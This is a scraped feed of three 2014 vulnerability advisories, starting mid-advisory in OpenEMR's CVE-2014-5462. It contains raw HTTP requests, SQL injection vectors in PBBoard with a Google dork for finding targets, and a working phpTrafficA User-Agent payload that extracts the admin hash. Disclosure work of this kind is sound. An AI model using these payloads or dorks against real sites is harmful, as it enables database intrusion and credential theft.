text=5&form_addr2=1&form_attn=5&form_country=U&form_freeb_type=2&form_phone=555-555-5555&form_partner=&form_name=P&form_zip=36&form_save=Save+as+New&form_state=W&form_city=W&form_cms_id=5
Request 14
POST /openemr/interface/patient_file/problem_encounter.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=p0locr2jieuagul105rkm95ob6
form_pelist=%2f&form_pid=0&form_save=Save&form_key=e
Request 15
POST /openemr/interface/reports/appointments_report.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5
form_show_available=on&form_refresh=&form_to_date=2014-07-25&patient=&form_provider=1&form_apptstatus=&with_out_facility=on&form_facility=4&form_apptcat=9&form_from_date=2014-07-25&with_out_provider=on&form_orderby=date
Request 16
POST /openemr/interface/patient_file/summary/demographics_save.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6; pma_lang=en; pma_collation_connection=utf8_general_ci
form_i2subscriber_employer_country=USA&i3subscriber_DOB=0000-00-00&i3accept_assignment=FALSE&i3subscriber_city=Winterville&form_hipaa_mail=NO&form_allow_imm_info_share=NO&form_street=5&i3effective_date=0000-00-00&form_i1subscriber_state=AL&form_interpretter=5&i1subscriber_lname=boom&form_title=Mr.&i1subscriber_fname=boom&form_fname=Asd&form_i1subscriber_employer_state=AL&form_i1subscriber_relationship=self&form_i1subscriber_country=USA&form_i3subscriber_employer_state=AL&form_contact_relationship=5&form_mothersname=boom&i2group_number=5&form_em_state=AL&form_i3subscriber_country=USA&form_allow_patient_portal=NO&i2copay=5&i2policy_number=5&form_i2subscriber_sex=Female&i1accept_assignment=FALSE&i3subscriber_postal_code=SW1A+1AA&i2subscriber_ss=5&i1subscriber_mname=boom&form_pharmacy_id=0&i3subscriber_phone=5&form_phone_home=5&form_lname=Asd&mode=save&form_i2subscriber_country=USA&i2subscriber_employer=5&db_id=1 &form_i1subscriber_employer_country=USA&form_d
eceased_reason=5&form_i2subscriber_state=AL&form_city=Winterville&form_email=winter@example.com&i3subscriber_employer_street=5&form_genericval2=asd&i3group_number=5&form_em_street=5&form_genericval1=asd&form_language=armenian&i1provider=&i2provider=&form_em_city=Winterville&form_em_name=boom&i3subscriber_fname=boom&form_race=amer_ind_or_alaska_native&i1plan_name=boom&i3subscriber_employer_city=Winterville&form_pubpid=asd&form_mname=Asd&i2subscriber_employer_street=5&form_financial_review=0000-00-00+00%3a00%3a00&i3subscriber_mname=boom&i3provider=&i3subscriber_employer_postal_code=SW1A+1AA&form_country_code=USA&form_em_country=USA&i2subscriber_phone=5&i3policy_number=5&form_status=married&form_ss=asdasd&form_monthly_income=01&i1effective_date=0000-00-00&form_i2subscriber_relationship=self&i3plan_name=boom&i1subscriber_employer_street=5&i1subscriber_city=Winterville&form_allow_imm_reg_use=NO&form_drivers_license=asd&form_i3subscriber_employer_country=USA&form_em_postal_code=SW
1A+1AA&form_hipaa_message=30&i1subscriber_employer_city=Winterville&i1subscriber_postal_code=SW1A+1AA&i3copay=5&i1copay=5&i3subscriber_street=5&i3policy_type=12&i1subscriber_street=5&form_vfc=eligible&form_i2subscriber_employer_state=AL&i2subscriber_street=5&form_guardiansname=boom&i1policy_number=5&i3subscriber_lname=boom&form_phone_contact=5&i2subscriber_employer_postal_code=SW1A+1AA&form_homeless=5&form_i1subscriber_sex=Female&form_i3subscriber_state=AL&form_referral_source=Patient&i2subscriber_fname=boom&i1subscriber_ss=5&form_providerID=1&form_state=AL&form_postal_code=SW1A+1AA&form_hipaa_allowsms=NO&i1subscriber_DOB=0000-00-00&i2subscriber_employer_city=Winterville&form_hipaa_allowemail=NO&form_DOB=1994-02-07&form_deceased_date=0000-00-00+00%3a00%3a00&i2effective_date=0000-00-00&i2subscriber_DOB=0000-00-00&i2subscriber_postal_code=SW1A+1AA&form_genericname2=asdasd&form_genericname1=asasd&i1group_number=5&i2subscriber_mname=boom&i2accept_assignment=FALSE&i1subscriber_em
ployer=5&i3subscriber_ss=5&form_phone_cell=5&i2subscriber_lname=boom&form_ethnicity=hisp_or_latin&i1subscriber_phone=5&form_occupation=5&i3subscriber_employer=5&form_hipaa_voice=NO&form_allow_health_info_ex=NO&form_ref_providerID=1&i1policy_type=12&i1subscriber_employer_postal_code=SW1A+1AA&i2plan_name=boom&i2policy_type=12&form_hipaa_notice=NO&form_migrantseasonal=5&form_i3subscriber_relationship=self&form_i3subscriber_sex=Female&form_family_size=5&i2subscriber_city=Winterville&form_phone_biz=5&form_sex=Female
Request 17
GET /openemr/interface/fax/fax_dispatch_newpid.php?p=1 HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6
Connection: keep-alive
Request 18
GET /openemr/interface/patient_file/reminder/patient_reminders.php?mode=simple&patient_id=1 HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=ra3sfkvd85bjve6qjm9ouq3225
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5462/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company,
registered in England in accordance with the Companies
Act under number 02763799. The registered office
address of Portcullis Computer Security Limited is:
Portcullis House, 2 Century Court, Tolpits Lane, Watford,
United Kingdom, WD18 9RS.
The information in this email is confidential and may be
legally privileged. It is intended solely for the addressee.
Any opinions expressed are those of the individual and
do not represent the opinion of the organisation. Access
to this email by persons other than the intended recipient
is strictly prohibited.
If you are not the intended recipient, any disclosure,
copying, distribution or other action taken or omitted to be
taken in reliance on it, is prohibited and may be unlawful.
When addressed to our clients any opinions or advice
contained in this email is subject to the terms and
conditions expressed in the applicable Portcullis Computer
Security Limited terms of business.
###############################################################
#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared
by MailMarshal.
#####################################################################################
(0)
↧
PBBoard CMS SQL Injection
Vulnerability title: SQL Injection in PBBoard CMS
CVE: CVE-2014-9215
CMS: PBBoard
Vendor: Power bulletin board - http://www.pbboard.info/
Product: http://sourceforge.net/projects/pbboard/files/PBBoard_v3.0.1/PBBoard_v3.0.1.zip/download
Affected version: Version 3.0.1 (updated on 13/09/2014) and before.
Fixed version: Version 3.0.1 (updated on 28/11/2014)
Google dork: intext:Powered By PBBoard
Reported by: Tran Dinh Tien - tien.d.tran@itas.vn
Credits to ITAS Team - www.itas.vn
:: DESCRITION ::
Multiple SQL injection vulnerabilities has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injection.
:: DETAILS :: Attack vector
Link 1:
POST /index.php?page=register&checkemail=1 HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.org/index.php?page=register&index=1&agree=1
Content-Length: 29
Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
email=<SQL Injection Here>&ajax=1
Link 2:
POST /index.php?page=forget&start=1 HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.org/index.php?page=forget&index=1
Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
code=0ae4e&email=<SQL Injection Here>&submit_forget=Save
link 3:
POST /index.php?page=forget&send_active_code=1 HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.org/index.php?page=forget&active_member=1&send_active_code=1
Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
code=13709&email=<SQL Injection Here>&submit_active_code=Save
:: CODE DETAIL ::
- Vulnerable parameter: email
- Vulnerable file: includes/functions.class.php
- Vulnerable function: CheckEmail($email)
- Vulnerable code:
function CheckEmail($email)
{
return preg_match('#^[a-z0-9.!#$%&'*+-/=?^_`{|}~]+@([0-9.]+|([^s'"<>@,;]+.+[a-z]{2,6}))$#si', $email) ? true : false;
}
- Fix code:
function CheckEmail($email)
{
// First, we check that there's one @ symbol, and that the lengths are right
if (!preg_match("/^[^@]{1,64}@[^@]{1,255}$/", $email)) {
// Email invalid because wrong number of characters in one section, or wrong number of @ symbols.
return false;
}
if (@strstr($email,'"')
or @strstr($email,"'")
or @strstr($email,'>')
or @strstr($email,'<')
or @strstr($email,'*')
or @strstr($email,'%')
or @strstr($email,'$')
or @strstr($email,'#')
or @strstr($email,'+')
or @strstr($email,'^')
or @strstr($email,'&')
or @strstr($email,',')
or @strstr($email,'~')
or @strstr($email,'!')
or @strstr($email,'{')
or @strstr($email,'}')
or @strstr($email,'(')
or @strstr($email,')')
or @strstr($email,'/'))
{
return false;
}
// Split it into sections to make life easier
$email_array = explode("@", $email);
$local_array = explode(".", $email_array[0]);
for ($i = 0; $i < sizeof($local_array); $i++) {
if (!preg_match("/^(([A-Za-z0-9!#$%&'*+/=?^_`{|}~-][A-Za-z0-9!#$%&'*+/=?^_`{|}~.-]{0,63})|("[^(\|")]{0,62}"))$/", $local_array[$i])) {
return false;
}
}
if (!preg_match("/^[?[0-9.]+]?$/", $email_array[1])) { // Check if domain is IP. If not, it should be valid domain name
$domain_array = explode(".", $email_array[1]);
if (sizeof($domain_array) < 2) {
return false; // Not enough parts to domain
}
for ($i = 0; $i < sizeof($domain_array); $i++) {
if (!preg_match("/^(([A-Za-z0-9][A-Za-z0-9-]{0,61}[A-Za-z0-9])|([A-Za-z0-9]+))$/", $domain_array[$i])) {
return false;
}
}
}
return true;
}
:: SOLUTION ::
Version 3.0.1 (updated on 28/11/2014)
:: DISCLOSURE ::
- 11/27/2014: Inform the vendor
- 11/28/2014: Vendor confirmed
- 11/28/2014: Vendor releases patch
- 12/01/2014: ITAS Team publishes information
::COPYRIGHT::
Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP (www.itas.vn).
:: DISCLAIMER ::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
:: REFERENCE ::
- http://www.itas.vn/news/ITAS-Team-discovered-SQL-Injection-in-PBBoard-CMS-68.html
- https://www.youtube.com/watch?v=AQiGvH5xrJg
|
(6)
↧
phpTrafficA SQL injection
Product: phpTrafficA
Product page: http://soft.zoneo.net/phpTrafficA/
Affected versions: Up to and including 2.3 (latest as of writing).
Description:
An SQL injection exists in Php/Functions/log_function.php, line 933:
$sql3 ="INSERT INTO `${table}_host` SET date='$date', host='',
hostname='', page='$page', ref='$cleanref', agent='$agent',
longIP='$iplong'";
The $agent variable comes directly from $_SERVER['HTTP_USER_AGENT'],
without any escaping. This makes SQL injection possible. Even if
multiple statements in one query has been turned off, the contents of
the database can still be read by manipulating the last parameter of the
query (the IPv4-address stored as an integer). For example, the
following spoofed user agent will store the ASCII-value of the second
character of the admin hash as its IP:
Firefox', longIP=(SELECT ASCII(SUBSTRING(value,2,1)) FROM
phpTrafficA_conf WHERE variable='adminpassword') #
This will be displayed in the "Latest visitors > Details" section, and
by repeating this procedure multiple times, the entire admin hash (or
any other database content) can be retrieved.
Partial mitigations:
- - Turn off "multiple statements in one query".
- - Hide "Latest visitors > Details" section from view. This prevents
the attacker from obtaining the output of the manipulated query.
- - Apply this quick fix to line 933:
$sql3 ="INSERT INTO `${table}_host` SET date='$date', host='',
hostname='', page='$page', ref='$cleanref',
agent='".mysql_real_escape_string($agent)."', longIP='$iplong'";
The code-fix does not resolve the SQL injection for all server
configurations, but should be sufficient for most. A proper fix would be
a version of phpTrafficA that uses PDO with prepared statements.
Best regards,
Daniel Geerts
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.14 (GNU/Linux)
|
(3)
↧